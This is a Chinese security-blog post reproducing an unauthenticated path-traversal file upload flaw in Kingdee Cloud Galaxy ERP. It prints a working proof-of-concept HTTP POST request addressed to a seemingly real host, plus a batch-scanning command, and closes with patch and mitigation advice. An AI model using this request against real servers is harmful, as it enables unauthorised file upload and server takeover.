【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞

admin 2023年11月21日12:17:58评论71 views字数 1070阅读3分34秒阅读模式
【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
喜欢就关注我吧,订阅更多最新消息

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
介绍

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。    
金蝶云星空管理中心ScpSupRegHandler接口存在任意文件上传漏洞。攻击者可在无需登录的情况下利用构造的文件名(如使用"../../../../"等路径穿越技巧)将恶意脚本文件上传至服务器上的非预期目录,最终可导致远程执行恶意命令,控制服务器。


【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
影响版本

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞

金蝶云星空企业版私有云

企业版私有云(订阅)

标准版私有云(订阅)

注:涉及版本:V6.2(含17年12月补丁) 至 V8.1(含23年9月补丁)


【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
漏洞复现

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
手动测试:
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host: nacos.storlead.comContent-Length: 283Content-Type: multipart/form-data; boundary=zsqxokgaAccept-Encoding: gzip
--zsqxokgaContent-Disposition: form-data; name="dbId_v"
.--zsqxokgaContent-Disposition: form-data; name="FID"
2022--zsqxokgaContent-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/kkk.txt"Content-Type: text/plain
a12345
--zsqxokga--

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞

批量脚本:

poc.exe -f urls.txt -o res.txt

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞

检测脚本后台回复  金蝶云星空ScpSupRegHandle  获取

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
修复建议

【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞
  1. 如非必要,将系统收缩至内网访问。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。
  2. 联系厂商进行漏洞补丁升级,补丁地址:
    https://vip.kingdee.com/school/detail/505412093244235264?productLineId=1

3. 部署企业级waf对上传接口进行拦截检测。


注:本文中提到的漏洞验证 poc 或工具仅用于授权测试,任何未经授权的测试均属于非法行为。任何人不得利用本文中的技术手段或工具进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。



原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月21日12:17:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传漏洞https://cn-sec.com/archives/2224990.html

发表评论

匿名网友 填写信息